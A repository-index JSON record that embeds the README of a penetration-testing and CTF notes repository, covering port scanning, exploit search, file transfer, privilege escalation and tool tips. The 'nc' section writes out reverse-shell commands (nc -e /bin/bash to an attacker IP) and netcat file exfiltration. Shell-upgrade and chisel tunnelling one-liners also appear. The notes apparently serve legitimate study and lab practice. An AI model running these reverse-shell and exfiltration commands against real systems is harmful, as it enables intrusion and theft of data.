{"id":18189864,"url":"https://github.com/bmedicke/pteh","last_synced_at":"2025-06-16T02:33:18.429Z","repository":{"id":141460965,"uuid":"304652594","full_name":"bmedicke/PTEH","owner":"bmedicke","description":"notes about 🗡️ Penetration Testing and 🦄 Ethical Hacking","archived":false,"fork":false,"pushed_at":"2022-05-16T06:43:09.000Z","size":1977,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-13T17:22:46.373Z","etag":null,"topics":["ethical-hacking","hackthebox","hackthebox-writeups","kali","kali-linux","pentesting","picoctf-writeups","security"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/bmedicke.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-10-16T14:35:03.000Z","updated_at":"2022-05-16T06:43:12.000Z","dependencies_parsed_at":null,"dependency_job_id":"fb3b4830-5faf-4a30-bf45-a936af5cfae3","html_url":"https://github.com/bmedicke/PTEH","commit_stats":{"total_commits":175,"total_committers":1,"mean_commits":175.0,"dds":0.0,"last_synced_commit":"f1599643f4eca6c17c75858d10ede9cd77effe94"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bmedicke%2FPTEH/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/bmedicke","download_url":"https://codeload.github.com/bmedicke/PTEH/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247675626,"owners_count":20977376,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ethical-hacking","hackthebox","hackthebox-writeups","kali","kali-linux","pentesting","picoctf-writeups","security"],"created_at":"2024-11-03T04:04:20.352Z","updated_at":"2025-04-07T14:49:59.026Z","avatar_url":"https://github.com/bmedicke.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PT𓀮EH\n\n**Notes about Penetration Testing and Ethical Hackin.**\n\n![crosshair](writeups/overthewire/media/crosshair.png)\n\n---\n\n[REED](https://github.com/bmedicke/REED) | PTEH\n\n---\n\n# toc\n\n\u003c!-- vim-markdown-toc GFM --\u003e\n\n* [the pentest process](#the-pentest-process)\n\t* [pre-engagement interactions](#pre-engagement-interactions)\n\t* [information gathering](#information-gathering)\n\t* [threat modeling](#threat-modeling)\n\t* [vulnerability analysis](#vulnerability-analysis)\n\t* [exploitation](#exploitation)\n\t* [post-exploitation](#post-exploitation)\n\t* [reporting](#reporting)\n* [CTF and wargame writeups](#ctf-and-wargame-writeups)\n* [Web Application Security](#web-application-security)\n* [enumeration](#enumeration)\n\t* [webapps](#webapps)\n* [foothold and pivot](#foothold-and-pivot)\n\t* [kali](#kali)\n\t* [linux](#linux)\n\t* [windows](#windows)\n* [privilege escalation](#privilege-escalation)\n\t* [linux](#linux-1)\n\t* [windows](#windows-1)\n* [bonus](#bonus)\n\t* [oneliners](#oneliners)\n\t* [kali config](#kali-config)\n\t* [kali tips](#kali-tips)\n\t* [basics](#basics)\n\t\t* [windows](#windows-2)\n\t\t* [linux](#linux-2)\n* [tools](#tools)\n\t* [find](#find)\n\t* [less](#less)\n\t* [nc](#nc)\n\t* [openssl](#openssl)\n\t* [socat and ncat](#socat-and-ncat)\n\t* [ssh](#ssh)\n\t* [Burp Suite](#burp-suite)\n\t* [sqlmap](#sqlmap)\n\t* [thc-hydra](#thc-hydra)\n\n\u003c!-- vim-markdown-toc --\u003e\n\n# the pentest process\n\nThis section follows the structure of the [Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) (PTES):\n\n## pre-engagement interactions\n\n## information gathering\n\n## threat modeling\n\n## vulnerability analysis\n\n## exploitation\n\n## post-exploitation\n\n## reporting\n\nDocumentation should start as soon as the pentenst starts to avoid situations\nwhere you need additional information but have already lost access to the target.\n\nCreating a mindmap is a good idea to get a clear but complete picture.\n\n* useful tools:\n  * [Freemind](http://freemind.sourceforge.net/) allows for attaching files, such as port scans, to nodes\n\n# CTF and wargame writeups\n\n* https://overthewire.org/ (linux)\n  * **[overthewire writeups](writeups/overthewire)** (in repo link)\n* https://underthewire.tech/ (powershell)\n* https://hackthebox.eu/\n  * **[hackthebox writeups](writeups/hackthebox)** (in repo link)\n* https://www.hacker101.com/\n* https://microcorruption.com/\n* http://smashthestack.org/\n* https://exploit-exercises.lains.space/ (mirror, original is down)\n\n# Web Application Security\n\n* **[webapp](webapp)** (in repo link)\n\n# enumeration\n\n\u003e port scanning\n\n```sh\nnmap -v $host | tee 00.nmap # fast initial scan.\nnmap -A -v -sS -oA 01 -T4 $host\nnmap -A -v -sS -oA 02 -p- $host\n```\n\n\u003e finding exploits\n\n* google\n* https://www.rapid7.com/db/\n* https://exploit-db.com\n\n```sh\n# CLI utility for https://exploit-db.com  database:\nsearchsploit motd # search exploits for message of the day.\nsearchsploit -x 1235.c # look at specific exploit.\n```\n\n## webapps\n\n* if it's a webapp/CMS/etc.:\n  * `dirb` it\n  * check out `robots.txt`\n  * try admin:admin credentials\n  * try default credentials\n    * `hydra`\n  * look for a copyright date in the header/footer\n    * usually not automatically generated\n  * try some vhosts by modifying the header with [Burp Suite](#burp-suite)\n\n# foothold and pivot\n\n## kali\n\n* don't forget about:\n  * `/usr/share/webshells`\n  * `/usr/share/windows-resources`\n  * `/usr/share/wordlists`\n\n\u003e serving files\n\n```sh\n# via webserver:\npython3 -m http.server 80\n\n# via samba:\nimpacket-smbserver -smb2server share .\n```\n\n\u003e reverse shells and port bindings\n\n```sh\n# netcat\nrlwrap nc -lnvp 42424\n\n# chisel\n# start the client first:\nchisel client -v 10.10.14.69 R:8888:127.0.0.1:8888\n# local: 8888\n# remote: 127.0.0.1:8888\nchisel server -v -p 12345 --reverse\n# connect with:\n\n# plink\n```\n\n## linux\n\n\u003e information gathering\n\n```sh\nuname -a # os info.\nid # user and groups.\nps -p $$ # name of current process.\nip a # or ifconfig.\nnetstat -tulpen # connections.\nlsblk # devices.\nlocate / # list of probably every file on the system.\n# depending on under which user updatedb ran.\n\nfind / -perm -4000 2\u003e/dev/null # setuid executables.\n# if any of these have an exploit they can be used\n# to elevate privileges to root.\n\n# pretty print of home files:\nfind /home -type f -printf \"%f\\t%p\\t%u\\t%g\\t%m\\n\" 2\u003e/dev/null | column -t | tee files\ndpkg -l # list of installed packages (and versions)\n```\n\n\u003e downloading files\n\n* on Linux you should save your files to `/dev/shm` (the ramdisk)\n  * type `mount | grep shm` to see that it is a tmpfs filesystem\n  * it gets wiped on unmount (you could clean up with `umount /dev/shm`)\n  * other choices:\n    * `/tmp` gets wiped on reboot (might be tmpfs)\n    * `/var/tmp` persists between reboots (not tmpfs)\n\n```sh\n# linux download:\nwget $h/file\ncurl $h/file -so file\n```\n\n\u003e info gathering with external tools\n\n\n```sh\n./linpeas.sh -a\n```\n\n## windows\n\n\u003e information gathering\n\n```sh\ndir /q\nwhoami /all\nsysteminfo\nset\ntasklist\nipconfig /all\nnetstat -nao | findstr 127 | findstr LISTEN\n\n# services\npowershell -c \"Get-Service | Format-Table -AutoSize\"\nsc # stop/start service\nnet start # old (from DOS)\n```\n\n\u003e downloading files\n\n```sh\n# powershell:\niwr hostname/file.exe -outf file.exe\n# long version:\nInvoke-WebRequest hostname/file.exe -OutFile file.exe\n```\n\n\u003e info gathering with external tools\n\n```sh\nlinpeas.exe\nlinpeas.bat # if exe fails.\n```\n\n# privilege escalation\n\n## linux\n\n* Kernel 2.6.22 to 4.8.3 Dirty Cow (`dirty.c`)\n\n## windows\n\n# bonus\n## oneliners\n\n```sh\n# upgrade shell:\npython -c 'import pty;pty.spawn(\"bash\")'\n\n# fix environment:\nexport TERM=linux\n\n# logging a reverse shell locally:\nscript # stop with ^D. breaks in vi. finicky.\n\n# get a temp dir:\ncd $(mktemp -d)\n\n# get local connections:\nnetstat -tulpen\n```\n\n## kali config\n\n```sh\n# pip2 for new Kalis:\ncurl -s https://bootstrap.pypa.io/get-pip.py | python2\npip2 install requests colorama # for the exploit above.\npip2 install xlrd # for windows exploit suggester.\napt install ncdu\n\npip3 install cve_searchsploit # https://github.com/andreafioraldi/cve_searchsploit\n# update it:\ncve_searchsploit -u\n\ncd /opt\ngit clone 'https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git'\ncd Windows-Exploit-Suggester\npython windows-exploit-suggester.py --update\npython windows-exploit-suggester.py --help\n\n# chisel\ncd /opt\nwget 'https://github.com/jpillora/chisel/releases/download/v1.7.1/chisel_1.7.1_windows_386.gz'\nwget 'https://github.com/jpillora/chisel/releases/download/v1.7.1/chisel_1.7.1_linux_386.gz'\ngunzip chisel*\nmv chisel*windows* chisel.exe\n```\n\n```sh\n# metasploit\nsudo service postgresql start\nsudo msfdb init\nmsfconsole # db_status\n```\n\n## kali tips\n\n* ranger disables previews for root (enable them on a by case basis with `zp`)\n\n## basics\n### windows\n\n```sh\n# windows get cmd.exe help:\nhelp\n\n# powershell\ncd $env:tmp\n\n# cmd.exe\ncd %tmp%\n```\n\n### linux\n\n```sh\numask -S # file creation mask.\n# help umask (linux)\n\nsudo -l # list allowed and forbidden commands.\n\nsudo -u kali whoami # run whoami as kali.\n\nbase64 # great for exfiltration without inet.\n# then just copy the text from the terminal.\n# -d to decode it again.\n# use pipes or pass a filename.\n\nstrings -e # different encoding options.\n\nfind . # get list of all files in dir.\n# great for lot's of files/folders with spaces\n# where autocompletion is broken.\n\nxdotool # fake keyboard mouse in X.\n```\n\n# tools\n\n## find\n\n```sh\n# look for binaries with SUID:\nfind / -perm -4000 2\u003e/dev/null\n```\n\n## less\n\n\u003e read raw control chars (colors).\n```sh\n./linpeas.sh | less -R\n```\n\n* less uses many vim bindings\n* press `h` for help\n* press `s` to save to a file\n* `Gg` scrolls to the bottom and back up, now you can use `^g` to show progress!\n\n## nc\n\n\u003e reverse shell\n```sh\n# attacker:\nnc -lnvp 12345\n\n# attackee:\nnc -e /bin/bash 10.10.14.69 12345 # most nix.\nnc -e cmd.exe 10.10.14.69 12345 # windows.\n```\n\n\u003e exfiltration by piping over the network\n```sh\n# attacker:\nnc -lnvp 12345 \u003e exfil_file\n\n# attackee:\nnc -q0 10.10.14.69 12345 \u003c exfil_file\n\n# on both:\nmd5sum exfil_file # and compare hashes to verify the transfer.\n```\n\n* commands this can be useful for: `dd`, `tar` (tar pipe)\n\n\u003e check for open port\n```sh\nnc -vvz localhost 443\n\n# multiple\nnc -vzz localhost 80 8080\n\n# or a range\nnc -vvz localhost 1-1024 2\u003e\u00261 | grep -v refused\n```\n\n## openssl\n\n* [man pages](https://www.openssl.org/docs/manmaster/man1/)\n  * `man openssl`\n  * `-help` flag for subcommands\n* for SSL connections:\n  * `s_client` and `s_server` subcommands\n    * `openssl s_client -connect localhost:443`\n    * `openssl s_server`\n* for hashing:\n  * `echo hello | openssl sha1`\n  * `openssl md5 test_file`\n* for encoding:\n  * `openssl base64 -in test_file`\n* for encryption:\n  * `openssl chacha20`\n  * `openssl aes256`\n\n## socat and ncat\n\n* for encrypted shells/exfiltration\n\n## ssh\n\n\u003e local port forwarding\n\n```sh\nssh -N kali -L 0.0.0.0:8080:tabby:8080 -L 0.0.0.0:80:tabby:80\n# binds tabby's 80 and 8080 to all interfaces on the executing server.\n```\n\n## Burp Suite\n\n* [Burp Suite](burp)\n\n## sqlmap\n\n## thc-hydra\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbmedicke%2Fpteh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbmedicke%2Fpteh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbmedicke%2Fpteh/lists"}